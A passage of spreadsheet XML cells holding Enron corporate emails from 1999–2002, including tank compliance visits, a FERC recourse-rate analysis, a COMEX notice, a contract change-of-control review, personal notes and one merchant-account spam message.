    <t>Tue, 3 Jul 2001 12:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.lawrence@enron.com'})</t>
  </si>
  <si>
    <t>Re: field visit of EOTT tanks</t>
  </si>
  <si>
    <t xml:space="preserve">Larry Campbell_x000D_
07/03/2001 04:06 PM_x000D_
To: Team Andrews/ET&amp;S/Enron@ENRON, Team Spraberry@Enron, Myron _x000D_
Maresch@eott.com_x000D_
cc: James R Lawrence/ET&amp;S/Enron@Enron, Scott Clark/OTS/Enron@ENRON, William _x000D_
Kendrick/OTS/Enron@Enron _x000D_
_x000D_
Subject: field visit of EOTT tanks_x000D_
_x000D_
In the final phase of developing and determining environmental compliance for _x000D_
the EOTT crude oil tanks in the Midland Region, I have planned a one day site _x000D_
visit on the following days to visit each team location to finalize the _x000D_
spreadsheet for EOTT crude oil tank environmental compliance:_x000D_
_x000D_
Andrews team  August 20 8:00 am_x000D_
_x000D_
Spraberry team  August 21 8:00 am_x000D_
_x000D_
Lamesa team  August 22 9:00 am_x000D_
 _x000D_
I would appreciate one member from each team be available at the team office _x000D_
on the assigned day and time to discuss tank history and possibly visit each _x000D_
tank farm within the teams area of responsibility. Your patience and _x000D_
assistance in finalizing this information will be greatly appreciated. If a _x000D_
conflict arises, give me a call at (505) 625-8022._x000D_
_x000D_
   _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 01:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dude, I am totally joking around with you.  You always look cute.  Well at _x000D_
least when you were dating me you always looked cute.</t>
  </si>
  <si>
    <t>Fri, 1 Feb 2002 11:48:54 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Scott Neal East desk meeting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Superty, Robert  _x000D_
Sent:	Friday, February 01, 2002 10:27 AM_x000D_
To:	Lamadrid, Victor_x000D_
Cc:	Neal, Scott_x000D_
Subject:	Scott Neal East desk meeting_x000D_
_x000D_
Victor, as mentioned, Scott wants to have a one hour meeting on Tuesday (I'll get the room setup) to talk about how he sees the desk operating in this new world. Here is what he wants to cover. _x000D_
_x000D_
List of trader responsibilities by pipe and point (Scott will do this)_x000D_
List of Logistics responsibilities by pipe (we do this)_x000D_
How will the business be different, only pool transactions? (open discussion)_x000D_
Talk about IT and short term Park and Loans and how that will be managed (open discussion)_x000D_
Emphasis on data collection and pipeline and market intelligience,OFO's, capacity constraints, LDC and other info. (open discussion) _x000D_
_x000D_
In addition, Scott really wants to set expectations and some ground rules. Can you get the guys focused on this, have them review and pull the necessary info? Also probably makes sense to spend a few minutes on deal entry so we all hear from the start who is expected to do what. That might be something Clarissa can pull together. _x000D_
_x000D_
Tks - Bob_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 10:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.vavrik@enron.com', 'john.oliver@enron.com', 'grant.oh@enron.com', 'janice.moore@enron.com', 'jin.guo@enron.com', 'genia.fitzgerald@enron.com', 'michael.rosen@enron.com', 'ian.dundas@enron.com', 'linda.noske@enron.com', 'jason.biever@enron.com', 'chris.wiebe@enron.com', 'jonathan.chapman@enron.com', 'justin.boyd@enron.com', 'fred.tan@enron.com', 'dean.laurent@enron.com', 'jenny.helton@enron.com', 'monique.sanchez@enron.com', 'greg.brazaitis@enron.com', 'louis.redshaw@enron.com', 'farzad.farhangnia@enron.com', 'gerald.nemec@enron.com', 'miles.lidsey@enron.com', 'sara.shackleton@enron.com', 'mary.dove@enron.com', 'caroline.abramo@enron.com', 'john.sherriff@enron.com', 'recipients@enron.com', 'jared.kaiser@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'suzanne.adams@enron.com', 'florian.neubauer@enron.com', 'derek.davies@enron.com', 'jozsef.balogh@enron.com', 'michael.slade@enron.com', 'lon.draper@enron.com', 'fraser.allen@enron.com', 'trang.dinh@enron.com', 'doug.leach@enron.com', 'homer.lin@enron.com', 'jason.wiesepape@enron.com', 'jeff.donahue@enron.com', 'jiri.novotny@enron.com', 'janet.moore@enron.com', 'russell.murrell@enron.com', 'john.gorman@enron.com', 'john.peyton@enron.com', 'john.disturnal@enron.com', 'dan.hyvl@enron.com', 'rebecca.cantrell@enron.com', 'david.redmond@enron.com', 'natasha.danilochkina@enron.com', 'jose.figueira@enron.com', 'shawna.flynn@enron.com', 'jivko.savov@enron.com', 'doug.wood@enron.com', 'don.baughman@enron.com', 'sandra.brawner@enron.com', 'fletcher.sturm@enron.com', 'iona.maclean@enron.com', 'john.arnold@enron.com', 'david.eubanks@enron.com', 'kelly.mccoy@enron.com', 'dick.jenkins@enron.com', 'john.suarez@enron.com', 'corry.bentley@enron.com', 'jeffrey.hodge@enron.com', 'stacey.white@enron.com', 'eric.gillaspie@enron.com', 'eric.moon@enron.com', 'kayne.coulter@enron.com', 'gregor.baumerich@enron.com', 'gareth.simpson@enron.com', 'elsie.lew@enron.com', 'jai.hawker@enron.com', 'robert.walker@enron.com', 'rudy.acevedo@enron.com', 'kay.young@enron.com', 'matthew.nicholas@enron.com', 'jitendra.patel@enron.com', 'debra.perlingiere@enron.com', 'hala.tayyarah@enron.com', 'harry.collins@enron.com', 'ed.mcmichael@enron.com', 'tom.shelton@enron.com', 'mark.schrab@enron.com', 'michelle.cash@enron.com', 'erik.hokmark@enron.com', 'derek.lynn@enron.com', 'jonathan.hoff@enron.com', 'mary.hopkins@enron.com', 'ian.sloman@enron.com', 'joe.gold@enron.com', 'paul.dawson@enron.com', 'gregg.penman@enron.com', 'gautam.gupta@enron.com', 'kenny.soignet@enron.com', 'deb.korkmas@enron.com', 'denis.bajolle@enron.com', 'david.baumbach@enron.com', 'mary.hain@enron.com', 'garrett.tripp@enron.com', 'elizabeth.mccarthy@enron.com', 'jim.homco@enron.com', 'gretchen.lotz@enron.com', 'victoria.johnson@enron.com', 'winston.cheng@enron.com', 'neil.jackson@enron.com', 'posey.martinez@enron.com', 'dustin.collins@enron.com', 'jarek.dybowski@enron.com', 'dan.lyons@enron.com', 'mary.heinitz@enron.com', 'cooper.richey@enron.com', 'paul.devries@enron.com', 'john.zufferli@enron.com', 'eric.shaw@enron.com', 'hector.godoy@enron.com', 'derek.anderson@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Enron is in the process of re-negotiating our contract with Dow Jones _x000D_
Interactive and we need to know if you are currently_x000D_
accessing this data.  In the near future there will be a cost associated with _x000D_
this information and you are currently listed as_x000D_
having a license.  _x000D_
_x000D_
Please click on the below link and let us know if you need continued access _x000D_
to this service._x000D_
_x000D_
http://nahou-webcl1.corp.enron.com/inquisite/DJI/DJI.html_x000D_
_x000D_
Thank You, _x000D_
Market Data _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Feb 2000 10:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dear Ben:_x000D_
_x000D_
I enjoyed meeting with you.  I sent a letter recommending you to our Dean_x000D_
in charge of the MBA program.  Let me know if you hear anything from the_x000D_
people in the admissions office._x000D_
_x000D_
I hope things work out and I have the opportunity to have you participate_x000D_
in our energy finance program._x000D_
_x000D_
By the way, I like the idea of bringing in various industry leaders.  I_x000D_
currently do this in my class, but it might make sense to consider ways to_x000D_
get first year students involved in this activity._x000D_
_x000D_
regards,_x000D_
_x000D_
Sheridan_x000D_
Sheridan Titman_x000D_
Department of Finance_x000D_
College of Business Administration_x000D_
University of Texas_x000D_
Austin, Texas 78712-1179_x000D_
_x000D_
512-232-2787 (phone)_x000D_
512-471-5073 (fax)_x000D_
_x000D_
titman@mail.utexas.edu</t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 14:42:55 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.valdes@enron.com'})</t>
  </si>
  <si>
    <t>new report</t>
  </si>
  <si>
    <t>John,_x000D_
_x000D_
There is another report that needs to be added to our daily duties, it is currently only being done once a month by accounting._x000D_
_x000D_
I'll show it to you in the morning._x000D_
_x000D_
_x000D_
KK</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 08:18:18 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: (MS-76) MEMBER FIRM PRIVILEGES</t>
  </si>
  <si>
    <t>Cheryl,_x000D_
Can Global verify the below acquisition of Merrill Lynch Futures, Inc. by Merrill Lynch, Pierce, Fenner &amp; Smith, Inc.?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shackleton, Sara  _x000D_
Sent:	Wednesday, November 14, 2001 10:03 AM_x000D_
To:	Panus, Stephanie_x000D_
Cc:	Jones, Tana_x000D_
Subject:	FW: (MS-76) MEMBER FIRM PRIVILEGES_x000D_
_x000D_
Stephanie:  Here's the infor for Global Contracts._x000D_
_x000D_
Tana:  Stephanie is updating Lotus Notes and verifying the transition._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Exchange Information &lt;Marketing@NYMEX.com&gt;@ENRON  _x000D_
Sent:	Wednesday, November 14, 2001 9:02 AM_x000D_
To:	Exchange Information_x000D_
Subject:	(MS-76) MEMBER FIRM PRIVILEGES_x000D_
_x000D_
Notice No. MS-76_x000D_
November 14, 2001_x000D_
_x000D_
COMMODITY EXCHANGE, INC._x000D_
_x000D_
MEMBER FIRM PRIVILEGES_x000D_
_x000D_
	Please be advised that effective with the close on November 2, 2001,_x000D_
Merrill Lynch, Pierce, Fenner &amp; Smith, Inc., has acquired Merrill Lynch_x000D_
Futures, Inc.  Merrill Lynch, Pierce, Fenner &amp; Smith, Inc. has assumed the_x000D_
clearing member firm privileges of Merrill Lynch Futures, Inc.  As a result,_x000D_
Merrill Lynch Futures, Inc. has been terminated as a clearing member firm of_x000D_
COMEX._x000D_
_x000D_
	Members and Member firms have (10) days from the date of this notice_x000D_
to advise the Corporate Secretary's Office of any claims against Merrill_x000D_
Lynch Futures, Inc._x000D_
_x000D_
	Inquires regarding the above should be directed to the Member_x000D_
Services Department at (212) 299-2377.</t>
  </si>
  <si>
    <t>Mon, 6 Dec 1999 08:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'molly.harris@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'samuel.schott@enron.com', 'tana.jones@enron.com', 'frank.davis@enron.com', 'karen.lambert@enron.com'})</t>
  </si>
  <si>
    <t>Credit Approvals</t>
  </si>
  <si>
    <t xml:space="preserve">Please find attached Credit's EOL responses for today._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
Molly_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 06:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marty.sunde@enron.com', 'kevin.hughes@enron.com', 'tony.spruiell@enron.com', 'kathryn.corbally@enron.com', 'gordon.savage@enron.com', 'erika.dupre@enron.com', 'kathy.bass@enron.com', 'richard.zdunkewicz@enron.com', 'angela.schwarz@enron.com', 'richard.sanders@enron.com', 'gfergus@brobeck.com', 'eric.letke@enron.com', 'paul.kaufman@enron.com', 'jeremy.blachman@enron.com', 'harry.kingerski@enron.com', 'mark.muller@enron.com', 'tanya.leslie@enron.com', 'leticia.botello@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karen.denne@enron.com', 'william.bradford@enron.com', 'jklauber@llgm.com', 'hgovenar@govadv.com', 'mpalmer@enron.com', 'michael.etringer@enron.com', 'rosalinda.tijerina@enron.com', 'ginger.dernehl@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richard.shapiro@enron.com', 'sharon.dick@enron.com', 'edward.sacks@enron.com', 'carol.moffett@enron.com', 'leasa.lopez@enron.com', 'debora.whitehead@enron.com', 'douglas.huth@enron.com', 'roger.yang@enron.com', 'dirk.vanulden@enron.com', 'jubran.whalan@enron.com', 'james.steffes@enron.com', 'evan.hughes@enron.com', 'jess.hewitt@enron.com', 'joe.hartsoe@enron.com', 'brenda.barreda@enron.com', 'bill.votaw@enron.com'})</t>
  </si>
  <si>
    <t>CA Leg Analyst Forecasts Significant Power Shortage in CA</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  In a letter to the California Legislature, the independent California _x000D_
Legislative Analyst is predicting significant shortages for this summer in _x000D_
excess of those predicted by the governor and the Cal Energy Commission._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 15 Dec 2001 03:06:30 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'s8tebh3k@msn.com'})</t>
  </si>
  <si>
    <t>frozenset({'uywnf4v@msn.com'})</t>
  </si>
  <si>
    <t>Expand Your Business!_x000D_
                                                   [uclck]</t>
  </si>
  <si>
    <t>Expand your business! Make it easy for your customers to_x000D_
pay using Visa, Master Card, Discover, American Express,_x000D_
Debit Card and Checks via Phone/Fax/Internet. How? Through_x000D_
a business Merchant Account!_x000D_
_x000D_
By providing multiple methods of acceptable payment you_x000D_
automatically help ensure that it will be easier for them_x000D_
to pay you and build up trust. People DON'T want to send_x000D_
cash or checks via mail, because it is dangerous and gives_x000D_
them absolutely no guarantees whatsoever._x000D_
_x000D_
So make it easier for your customers and setup a Merchant_x000D_
Account for your business. There are NO setup fees, and_x000D_
the monthly costs are very low. To obtain more information,_x000D_
please reply to this email with your name, phone number_x000D_
with area code, and a good time to call. You will be_x000D_
contacted within 10 business days by one of our staff._x000D_
Thank you for your time._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To be removed from our contact list, send us an email_x000D_
with the subject "Remove"  and you will be automatically_x000D_
taken off our list. If removal does not work, reply with_x000D_
your email address in the Body of the email_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
s8tebh3k</t>
  </si>
  <si>
    <t>Wed, 17 Jan 2001 23:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Houses</t>
  </si>
  <si>
    <t>I went by some houses last night . . ._x000D_
_x000D_
_x000D_
This house was by far the nicest and best bang for your buck, but in a _x000D_
suspect neighborhood - it looks like they are building a lot of townhouses _x000D_
close though_x000D_
check it out . . . _x000D_
http://www.har.com/search/condo/indexdetail.cfm?mlnum=203161_x000D_
_x000D_
These were nice too - more contemporary though . . ._x000D_
http://www.har.com/search/condo/indexdetail.cfm?mlnum=389305_x000D_
_x000D_
We should probably go look at these on Sunday._x000D_
_x000D_
Love,_x000D_
e</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 09:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Metro 214 and 216 downtown route changes</t>
  </si>
  <si>
    <t xml:space="preserve">Employees who ride Metro bus routes 214 and 216 please note that Monday, _x000D_
November 13, 2000, the buses will return to their normal route on Lousiana _x000D_
instead of Milam for the afternoon.  </t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 02:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'claudia.perez@enron.com', 'keegan.farrell@enron.com', 'janice.moore@enron.com', 'kaye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'linda.simmons@enron.com', 'richard.sanders@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jenny.helton@enron.com', 'mark.taylor@enron.com', 'mark.greenberg@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'james.grace@enron.com', 'francisco.leite@enron.com', 'kathleen.carnahan@enron.com', 'mary.ogden@enron.com', 'suzanne.adams@enron.com', 'linda.guinn@enron.com', 'samantha.boyd@enron.com', 'legal.1@enron.com', 'mary.cook@enron.com', 'lance.schuler-legal@enron.com', 'larry.pardue@enron.com', 'sandi.braband@enron.com', 'taffy.milligan@enron.com', 'bob.carter@enron.com', 'theresa.zucha@enron.com', 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'sheila.tweed@enron.com', 'coralina.rivera@enron.com', 'diane.goode@enron.com', 'barbara.gray@enron.com', 'daniel.rogers@enron.com', 'mark.haedicke@enron.com', 'dan.hyvl@enron.com', 'pat.radford@enron.com', 'nita.garcia@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'paula.craft@enron.com', 'samantha.ferguson@enron.com', 'kay.mann@enron.com', 'legal.2@enron.com', 'connie.castillo@enron.com', 'shawna.flynn@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'steve.hooser@enron.com', 'matt.maxwell@enron.com', 'gloria.cruz@enron.com', 'leslie.hansen@enron.com', 'stuart.zisman@enron.com', 'nancy.corbet@enron.com', 'peggy.banczak@enron.com', 'becky.spencer@enron.com', 'anne.koehler@enron.com', 'eric.gillaspie@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'maryhelen.martinez@enron.com', 'angela.davis@enron.com', 'janet.h.moore@enron.com', 'stacy.dickson@enron.com', 'robert.walker@enron.com', 'kay.young@enron.com', 'sarah.macdonald@enron.com', 'reginald.shanks@enron.com', 'debra.perlingiere@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'holly.keiser@enron.com', 'peter.vecchio@enron.com', 'robert.george@enron.com', 'cheryl.nelson@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'travis.mccullough@enron.com', 'claudia.meraz@enron.com', 'brenda.whitehead@enron.com', 'brent.hendry@enron.com', 'eddy.daniels@enron.com', 'deb.korkmas@enron.com', 'andrew.edison@enron.com', 'twanda.sweet@enron.com', 'martha.braddy@enron.com', 'ann.white@enron.com', 'roger.balog@enron.com', 'elizabeth.sager@enron.com', 'teresa.bushman@enron.com', 'legal.3@enron.com', 'ned.crady@enron.com', 'john.viverito@enron.com', 'esmeralda.gonzalez@enron.com', 'dan.lyons@enron.com', 'shari.stack@enron.com', 'mary.heinitz@enron.com', 'frank.sayre@enron.com', 'tana.jones@enron.com', 'margaret.doucette@enron.com', 'sheri.cromwell@enron.com', 'dina.snow@enron.com', 'robert.bruce@enron.com'})</t>
  </si>
  <si>
    <t>March Birthday Celebration</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
Holly Keiser_x000D_
Enron Americas_x000D_
Legal Department - EB 3887_x000D_
713-345-7893 (ph)_x000D_
713-646-3490 (fx)_x000D_
Holly.Keiser@enron.com</t>
  </si>
  <si>
    <t>Tue, 21 Dec 1999 02:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Friendly Reminder: Monthly Significant Litigation Report</t>
  </si>
  <si>
    <t xml:space="preserve">no comments this month_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
DENISE LAGESSE_x000D_
12/20/99 02:35 PM_x000D_
To: Louis Soldano/ET&amp;S/Enron@ENRON, Colleen Raker/ET&amp;S/Enron@ENRON, Philip _x000D_
Crowley/ET&amp;S/Enron@ENRON, Kim Wilkie/ET&amp;S/Enron@ENRON, Bret _x000D_
Reich/ET&amp;S/Enron@ENRON, Susan Scott/ET&amp;S/Enron@ENRON, Lee _x000D_
Huber/ET&amp;S/Enron@ENRON, Drew Fossum/ET&amp;S/Enron@ENRON, Dari _x000D_
Dornan/ET&amp;S/Enron@ENRON, Jim Talcott/ET&amp;S/Enron@ENRON, Kathy _x000D_
Ringblom/ET&amp;S/Enron@ENRON, Eric Benson/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Friendly Reminder: Monthly Significant Litigation Report_x000D_
_x000D_
I have not yet received your comments to the Monthly Report, which is _x000D_
attached below.  Please send your comments to me (not Emily) as soon as _x000D_
possible.  If you do not have comments this month, please let me know so that _x000D_
I can mark you off the list.  Thanks very much! :)_x000D_
_x000D_
---------------------- Forwarded by Denise LaGesse/ET&amp;S/Enron on 12/20/99 _x000D_
02:27 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Emily Sellers                           12/16/99 09:25 AM_x000D_
	_x000D_
_x000D_
To: Louis Soldano/ET&amp;S/Enron, Colleen Raker/ET&amp;S/Enron@ENRON, Candace _x000D_
Kyle/ET&amp;S/Enron@ENRON, Philip Crowley/ET&amp;S/Enron@ENRON, Kim _x000D_
Wilkie/ET&amp;S/Enron@ENRON, Bret Reich/ET&amp;S/Enron@ENRON, Susan _x000D_
Scott/ET&amp;S/Enron@ENRON, Lee Huber/ET&amp;S/Enron@ENRON, Drew _x000D_
Fossum/ET&amp;S/Enron@ENRON, Dari Dornan/ET&amp;S/Enron@ENRON, Jim _x000D_
Talcott/ET&amp;S/Enron@ENRON, Maria Pavlou/ET&amp;S/Enron@ENRON, Kathy _x000D_
Ringblom/ET&amp;S/Enron@ENRON, Peggy Phillips/FGT/Enron@ENRON, Eric _x000D_
Benson/ET&amp;S/Enron@ENRON_x000D_
cc:  (bcc: Denise LaGesse/ET&amp;S/Enron)_x000D_
_x000D_
Subject: Monthly Significant Litigation Report_x000D_
_x000D_
Attached is November's Monthly Report.  I know I'm asking for your revisions _x000D_
to it earlier than usual, but with everyone being out during the holidays _x000D_
(myself included) we decided it would be easier to incorporate changes you _x000D_
make to this report into the Weekly so you only have to update one report._x000D_
_x000D_
Denise Lagesse is going to do the updates next week for me while I'm on _x000D_
vacation so send your changes and new items to her by Friday, December _x000D_
17th.....Thanks....and Merry Christmas everybody......!!!!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 10:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Recourse rate dilemma: the sequel</t>
  </si>
  <si>
    <t xml:space="preserve">Maria and Drew, this is a long-winded e-mail but please bear with me..._x000D_
_x000D_
The problem:_x000D_
_x000D_
As you probably remember, several months ago several of us met to discuss the _x000D_
following language in the ROFR portion of Transwestern's tariff: "if the rate _x000D_
bid exceeds the maximum tariff rate, then the rate will be considered to be _x000D_
the maximum tariff rate," and the additional frustrating language "[a]ll _x000D_
available capacity shall be allocated under these procedures . . .."  At our _x000D_
last meeting, we concluded that probably the best way to ensure that TW could _x000D_
capture the true value of the capacity would be to link the negotiated rate _x000D_
to index prices.  However, since this usually involves an unacceptable amount _x000D_
of risk to both the shipper and TW, the marketers haven't done any _x000D_
index-based rates and have no current plans to enter into any such deals.  I _x000D_
have been asked by the Commercial Group to revisit this issue and to think of _x000D_
other ways we could increase our ability to charge more than the maximum _x000D_
rate.   Ideally they would like to eliminate the language I've quoted above.  _x000D_
However, my research has indicated that absent our 1) bringing about radical _x000D_
change in the way FERC thinks about recourse rates or 2) showing that TW _x000D_
lacks market power, we are probably stuck with this language._x000D_
_x000D_
Why the problem exists (you may already know):_x000D_
_x000D_
Steve Stojic and I did some looking into why the language is in our tariff in _x000D_
the first place.  In the Alternative Rates Policy Statement (RM95-6-000), the _x000D_
Commission explained that it is willing to entertain individual requests for _x000D_
negotiated rates, but only where customers retain the ability to choose a _x000D_
cost-of-service based tariff rates.  "[T]he availability of a recourse _x000D_
service would prevent pipelines from exercising market power by assuring that _x000D_
the customer can fall back to cost-based, traditional service if the pipeline _x000D_
unilaterally demands excessive prices or withholds service.  Thus, the _x000D_
recourse rate mitigates market power."  _x000D_
_x000D_
The Commission went on to confirmed that under ROFR provisions the highest _x000D_
rate that an existing shipper must match if it wishes to continue its _x000D_
transportation arrangement is the maximum tariff rate. This policy is clearly _x000D_
not limited to ROFR situations:  when capacity is constrained, a shipper _x000D_
willing to pay only the recourse rate cannot lose access to capacity merely _x000D_
because someone else is willing to pay a negotiated rate.  "When there are _x000D_
more requests for capacity than there is capacity available, then the _x000D_
pipeline must allocate capacity among those shippers willing to pay either _x000D_
the negotiated rate or the maximum recourse rate, for example on a pro rata _x000D_
basis if required by its tariff."  The example cited by the Commission:  If a _x000D_
pipeline has 100 Dth/d available and two shippers request that capacity, one _x000D_
who is willing to pay no more than the recourse rate of $5 and another a _x000D_
negotiated rate of $6, then each would be allocated 50 Dth/d on a pro rata _x000D_
basis (assuming the tariff provided for pro rata allocation and not some _x000D_
other allocation method such as lottery).  _x000D_
_x000D_
When TW filed for authority to charge negotiated rates, it voluntarily added _x000D_
the statement that "if the rate bid exceeds the maximum tariff rate, then the _x000D_
rate will be considered to be the maximum tariff rate."  Presumably we had _x000D_
concluded that we needed to add this recourse rate related provision in order _x000D_
to receive negotiated rate authority.  _x000D_
_x000D_
Solutions??_x000D_
_x000D_
I would like to know whether you concur that changing our tariff language _x000D_
outright is probably out of the question.  I feel as if I've really been _x000D_
chasing my tail here.  I have owed Lindy an answer for some time now.  But I _x000D_
keep coming back to our having to prove lack of market power (which, Drew, is _x000D_
where I believe you were headed when we talked about this in mid-October).  _x000D_
Steve Harris has asked whether we can just start small and remove the _x000D_
recourse rate cap as to only a portion of our system.  I think we would still _x000D_
have to show lack of market power in order to do this.  Do you agree?  Stojic _x000D_
warns that proving lack of market power is a lengthy and expensive _x000D_
proposition.  Might be worth it to us, though._x000D_
_x000D_
Another idea is to somehow provide shippers with an incentive to pay more _x000D_
than max rate.  After all, we do have authority to charge negotiated rates.  _x000D_
We've seen one instance in which one of our marketers was able to get more _x000D_
than max rates for IT space based on good customer relations alone.  However, _x000D_
despite our wonderful relationships with most of our customers, it's unlikely _x000D_
we can pull this off with any consistency.  We wondered whether we might be _x000D_
able to get more than max rates in the context of an auction procedure.  But _x000D_
I just am not convinced we could get around the Commission's requirement that _x000D_
recourse rates be available.  That requirement has not changed.  Have either _x000D_
of you seen anything to the contrary?  _x000D_
_x000D_
I would like to meet with you two, plus several others I have in mind, to _x000D_
discuss this, preferably early this week (Tues. or Wed.), but would like to _x000D_
discuss briefly with you first.  Please call me so we can talk for a few _x000D_
minutes.  Thanks. _x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 23:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Revised draft attributes paper</t>
  </si>
  <si>
    <t xml:space="preserve">Can we review over weekend- I'll ask Maureen to schedule an hour for the 3 of _x000D_
us on Monday._x000D_
---------------------- Forwarded by Richard Shapiro/NA/Enron on 03/02/2001 _x000D_
07:39 AM ---------------------------_x000D_
_x000D_
_x000D_
"Seabron Adamson" &lt;seabron.adamson@frontier-economics.com&gt; on 03/01/2001 _x000D_
05:42:09 PM_x000D_
To: &lt;James.D.Steffes@enron.com&gt;, &lt;Richard.Shapiro@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Revised draft attributes paper_x000D_
_x000D_
_x000D_
_x000D_
Please see attached._x000D_
_x000D_
We have tried to develop five basic market objectives, show why these_x000D_
critical given Enron's strategic position, and describe some of the market_x000D_
attributes that follow from the positions. I think these attributes will_x000D_
lead directly to (at least our) proposed "ideal" RTO structure._x000D_
_x000D_
We can cut down some of the background discussion if you wish to circulate_x000D_
it to any other audiences within the company. But I wanted you guys to have_x000D_
a sense of where we are coming from with respect to some of the conclusions._x000D_
_x000D_
Unless instructed otherwise I will continue to circulate documents only to_x000D_
the two of you, and you can forward to others as you see fit._x000D_
_x000D_
_x000D_
Seabron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 01-03-01 SA Draft paper on market objectives and attributes.doc_x000D_
</t>
  </si>
  <si>
    <t>Sat, 27 Oct 2001 18:02:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jim.armogida@enron.com', 'douglas.nichols@enron.com', 't..hodge@enron.com', 'rob.walls@enron.com', 'deb.korkmas@enron.com', 'clement.abrams@enron.com', 'peter.keohane@enron.com', 'bruce.lundstrom@enron.com', 'sheila.tweed@enron.com', 'elizabeth.sager@enron.com', 'r..rogers@enron.com', 'drew.fossum@enron.com', 'n..gray@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'dan.lyons@enron.com', 'g..bushman@enron.com', 'h..george@enron.com', 'vicki.sharp@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'john.ale@enron.com', 'robert.eickenroht@enron.com', 'john.schwartzenburg@enron.com', 'rex.rogers@enron.com', 'j..heinitz@enron.com', 'eric.newell@enron.com'})</t>
  </si>
  <si>
    <t>FW: Material Contract Review -- ASAP</t>
  </si>
  <si>
    <t>We have heard from many of you regarding the attached request.  This e-mail lets you know suggested recipients to date.  It also confirms that (i) the current goal is to ascertain whether a change of ownership of either Enron Corp. or Enron North America Corp. will cause contract breaches, defaults or terminations resulting in material liabilities and (ii) the timetable is as soon as possible.  Preliminary responses early this week (subject to further review as necessary) would be most helpful._x000D_
_x000D_
Thanks again, NJD    _x000D_
 _x000D_
 -----Original Message-----_x000D_
From: 	Dobin, Nora  _x000D_
Sent:	Friday, October 26, 2001 10:30 PM_x000D_
To:	Rogers, Rex; Eickenroht, Robert; Armogida, Jim; Abrams, Clement; Taylor, Mark E (Legal); Tweed, Sheila; George, Robert H.; Sager, Elizabeth; Gray, Barbara N.; Bushman, Teresa G.; Aronowitz, Alan; Keohane, Peter; Murray, Julia; Heinitz, Mary J.; Korkmas, Deb; Lyons, Dan; Hodge, Jeffrey T.; Evans, Mark (London Legal)_x000D_
Cc:	Haedicke, Mark E.; Schuler, Lance (Legal); Mintz, Jordan_x000D_
Subject:	RE: Material Contract Review -- ASAP_x000D_
_x000D_
To clarify, consider contracts to which Enron Corp., Enron North America Corp. or their subsidiaries are parties that contain provisions concerning a change of ownership/control of Enron Corp. or Enron North America Corp.  At this point, we are considering material contracts, or a group of similar or standard contracts that collectively are material, or contracts the breach of which could result in material liability._x000D_
_x000D_
Thanks, NJD_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dobin, Nora  _x000D_
Sent:	Friday, October 26, 2001 6:05 PM_x000D_
To:	Rogers, Rex; Eickenroht, Robert; Armogida, Jim; Abrams, Clement; Taylor, Mark E (Legal); Tweed, Sheila; George, Robert H.; Sager, Elizabeth; Gray, Barbara N.; Bushman, Teresa G.; Aronowitz, Alan; Keohane, Peter; Murray, Julia; Heinitz, Mary J.; Korkmas, Deb; Lyons, Dan; Hodge, Jeffrey T._x000D_
